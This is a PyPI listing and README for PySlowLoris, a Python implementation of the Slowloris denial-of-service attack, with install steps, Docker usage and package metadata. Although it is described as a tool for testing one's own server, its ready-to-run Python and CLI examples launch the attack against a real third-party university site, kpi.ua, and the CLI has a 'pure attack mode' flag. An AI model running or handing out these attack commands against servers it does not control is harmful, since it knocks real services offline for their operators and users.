# PySlowLoris
[](https://gitter.im/SlowLoris-dev/Lobby)
[](https://github.com/maxkrivich/SlowLoris/blob/master/LICENSE)
[](https://github.com/maxkrivich/SlowLoris)
[](https://travis-ci.org/maxkrivich/SlowLoris)
[](https://badge.fury.io/py/pyslowloris)
PySlowLoris is a tool for testing if your web server is vulnerable to slow-requests kind of attacks. The module is based on python-trio for Asynchronous I/O and poetry for dependency management. The idea behind this approach to create as many connections with a server as possible and keep them alive and send trash headers through the connection. Please DO NOT use this in the real attacks on the servers.
More information about the attack you can find [here].
### Installation
#### PyPi
For installation through the PyPI:
```sh
$ pip install pyslowloris==2.0.1
```
This method is prefered for installation of the most recent stable release.
#### Source-code
For installation through the source-code for local development:
```sh
$ git clone https://github.com/[username]/SlowLoris.git
$ cd SlowLoris
$ pip install poetry
$ pyenv install 3.8.3
$ pyenv local 3.8.3
$ poetry env use 3.8.3
```
### Basic Usage
Available command list:
```sh
$ slowloris --help
usage: slowloris [-h] -u URL [-c CONNECTION_COUNT] [-s]
Asynchronous Python implementation of SlowLoris attack
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Link to a web server (http://google.com) - str
-c CONNECTION_COUNT, --connection-count CONNECTION_COUNT
Count of active connections (default value is 247) - int
-s, --silent Ignore all of the errors [pure attack mode] - bool
```
### Docker usage
#### Download image from Docker Hub
Pull the image from [Docker Hub](https://hub.docker.com/r/maxkrivich/pyslowloris/) and run a container:
```bash
$ docker pull maxkrivich/pyslowloris
$ docker run --rm -it maxkrivich/pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]
```
#### Build image from source-code
Also you can build image from [Dockerfile](https://github.com/maxkrivich/SlowLoris/blob/master/Dockerfile) and run a container:
```bash
$ docker build -t pyslowloris .
$ docker run --rm -it pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]
```
**Note:** *Don't forget about 'sudo'!*
### Example of usage
#### How to use module through Python API
Here is an example of usage
```python
from pyslowloris import HostAddress, SlowLorisAttack
url = HostAddress.from_url("http://kpi.ua")
connections_count = 100
loris = SlowLorisAttack(url, connections_count, silent=True)
loris.start()
```
#### How to use module via CLI
The following command helps to use module from command line
```sh
$ slowloris -u http://kpi.ua/ -c 100 -s
```
###### stop execution: Ctrl + C
### Testing
#### Testing with real apache server
```bash
$ docker-compose up web_server -d
$ .....
```
#### Module-tests
```bash
$ make pytest
```
### Bugs, issues and contributing
If you find [bugs] or have [suggestions] about improving the module, don't hesitate to contact me.
### License
This project is licensed under the MIT License - see the [LICENSE](https://github.com/maxkrivich/SlowLoris/blob/master/LICENSE) file for details
Copyright (c) 2017-2020 Maxim Krivich
[here]: <https://en.wikipedia.org/wiki/Slowloris_(computer_security)>
[bugs]: <https://github.com/maxkrivich/SlowLoris/issues>
[suggestions]: <https://github.com/maxkrivich/SlowLoris/issues>
Raw data
{
"_id": null,
"home_page": "https://github.com/maxkrivich/SlowLoris",
"name": "pyslowloris",
"maintainer": null,
"docs_url": null,
"requires_python": "<4.0,>=3.9",
"maintainer_email": null,
"keywords": "SlowLoris, dos, slowloris, apache, dos-attacks, denial-of-service, http, exploit, dos-tool, hacker-scripts, hacking-tool, hacking, vulnerability, slow-requests, cybersecurity, cyber-security, information-security, security",
"author": "Maxim Krivich",
"author_email": "maxkrivich@gmail.com",
"download_url": "https://files.pythonhosted.org/packages/d0/c0/8dfcd5f4cbd414b0e9425aff5c01b2daa33093a2deea8f986516ac8f606c/pyslowloris-2.0.3.tar.gz",
"platform": null,
"description": "# PySlowLoris\n[](https://gitter.im/SlowLoris-dev/Lobby)\n[](https://github.com/maxkrivich/SlowLoris/blob/master/LICENSE)\n[](https://github.com/maxkrivich/SlowLoris)\n[](https://travis-ci.org/maxkrivich/SlowLoris)\n[](https://badge.fury.io/py/pyslowloris)\n\nPySlowLoris is a tool for testing if your web server is vulnerable to slow-requests kind of attacks. The module is based on python-trio for Asynchronous I/O and poetry for dependency management. The idea behind this approach to create as many connections with a server as possible and keep them alive and send trash headers through the connection. Please DO NOT use this in the real attacks on the servers.\n\nMore information about the attack you can find [here].\n\n### Installation\n\n#### PyPi\n\nFor installation through the PyPI:\n\n```sh\n$ pip install pyslowloris==2.0.1\n```\nThis method is prefered for installation of the most recent stable release.\n\n\n#### Source-code\n\nFor installation through the source-code for local development:\n```sh\n$ git clone https://github.com/[username]/SlowLoris.git\n$ cd SlowLoris\n$ pip install poetry\n$ pyenv install 3.8.3\n$ pyenv local 3.8.3\n$ poetry env use 3.8.3\n```\n\n### Basic Usage\n\nAvailable command list:\n\n```sh\n$ slowloris --help\nusage: slowloris [-h] -u URL [-c CONNECTION_COUNT] [-s]\n\nAsynchronous Python implementation of SlowLoris attack\n\noptional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Link to a web server (http://google.com) - str\n -c CONNECTION_COUNT, --connection-count CONNECTION_COUNT\n Count of active connections (default value is 247) - int\n -s, --silent Ignore all of the errors [pure attack mode] - bool\n```\n\n### Docker usage\n\n#### Download image from Docker Hub\n\nPull the image from [Docker Hub](https://hub.docker.com/r/maxkrivich/pyslowloris/) and run a container:\n\n```bash\n$ docker pull maxkrivich/pyslowloris\n$ docker run --rm -it maxkrivich/pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]\n```\n\n#### Build image from source-code\n\nAlso you can build image from [Dockerfile](https://github.com/maxkrivich/SlowLoris/blob/master/Dockerfile) and run a container:\n\n```bash\n$ docker build -t pyslowloris .\n$ docker run --rm -it pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]\n```\n\n**Note:** *Don't forget about 'sudo'!*\n\n\n\n### Example of usage\n\n#### How to use module through Python API\nHere is an example of usage\n\n```python\nfrom pyslowloris import HostAddress, SlowLorisAttack\n\nurl = HostAddress.from_url(\"http://kpi.ua\")\nconnections_count = 100\n\nloris = SlowLorisAttack(url, connections_count, silent=True)\nloris.start()\n```\n\n#### How to use module via CLI\n\nThe following command helps to use module from command line\n\n```sh\n$ slowloris -u http://kpi.ua/ -c 100 -s\n```\n###### stop execution: Ctrl + C\n\n\n\n### Testing\n\n#### Testing with real apache server\n\n```bash\n$ docker-compose up web_server -d\n$ .....\n```\n\n#### Module-tests\n```bash\n$ make pytest\n```\n\n### Bugs, issues and contributing\n\nIf you find [bugs] or have [suggestions] about improving the module, don't hesitate to contact me.\n\n### License\n\nThis project is licensed under the MIT License - see the [LICENSE](https://github.com/maxkrivich/SlowLoris/blob/master/LICENSE) file for details\n\nCopyright (c) 2017-2020 Maxim Krivich\n\n[here]: <https://en.wikipedia.org/wiki/Slowloris_(computer_security)>\n[bugs]: <https://github.com/maxkrivich/SlowLoris/issues>\n[suggestions]: <https://github.com/maxkrivich/SlowLoris/issues>\n",
"bugtrack_url": null,
"license": "MIT",
"summary": "Asynchronous Python implementation of SlowLoris DoS attack",
"version": "2.0.3",
"project_urls": {
"Bug Tracker": "https://github.com/maxkrivich/SlowLoris/issues",
"Homepage": "https://github.com/maxkrivich/SlowLoris",
"Repository": "https://github.com/maxkrivich/SlowLoris"
},
"split_keywords": [
"slowloris",
" dos",
" slowloris",
" apache",
" dos-attacks",
" denial-of-service",
" http",
" exploit",
" dos-tool",
" hacker-scripts",
" hacking-tool",
" hacking",
" vulnerability",
" slow-requests",
" cybersecurity",
" cyber-security",
" information-security",
" security"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "09a5ee39fee1466879e80ef923267c17a6456f9d6a2e0518eaa52ee4d8314e79",
"md5": "1995a2cab3307b4f7b76eee828b7c881",
"sha256": "fed51a9a9de099a9fdb40b8aa0eab76eaad9cd28f58b3cf476b324ca0d9b8692"
},
"downloads": -1,
"filename": "pyslowloris-2.0.3-py3-none-any.whl",
"has_sig": false,
"md5_digest": "1995a2cab3307b4f7b76eee828b7c881",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": "<4.0,>=3.9",
"size": 13873,
"upload_time": "2024-09-08T08:18:09",
"upload_time_iso_8601": "2024-09-08T08:18:09.831174Z",
"url": "https://files.pythonhosted.org/packages/09/a5/ee39fee1466879e80ef923267c17a6456f9d6a2e0518eaa52ee4d8314e79/pyslowloris-2.0.3-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "d0c08dfcd5f4cbd414b0e9425aff5c01b2daa33093a2deea8f986516ac8f606c",
"md5": "15e6565c0e70ebe9b96cab642217093c",
"sha256": "76420dd0a87b1435c4be959f5c1c191e12be91dc71f8ac1616db7b8d1de9a815"
},
"downloads": -1,
"filename": "pyslowloris-2.0.3.tar.gz",
"has_sig": false,
"md5_digest": "15e6565c0e70ebe9b96cab642217093c",
"packagetype": "sdist",
"python_version": "source",
"requires_python": "<4.0,>=3.9",
"size": 8603,
"upload_time": "2024-09-08T08:18:11",
"upload_time_iso_8601": "2024-09-08T08:18:11.045071Z",
"url": "https://files.pythonhosted.org/packages/d0/c0/8dfcd5f4cbd414b0e9425aff5c01b2daa33093a2deea8f986516ac8f606c/pyslowloris-2.0.3.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2024-09-08 08:18:11",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "maxkrivich",
"github_project": "SlowLoris",
"travis_ci": false,
"coveralls": false,
"github_actions": true,
"lcname": "pyslowloris"
}
JSON
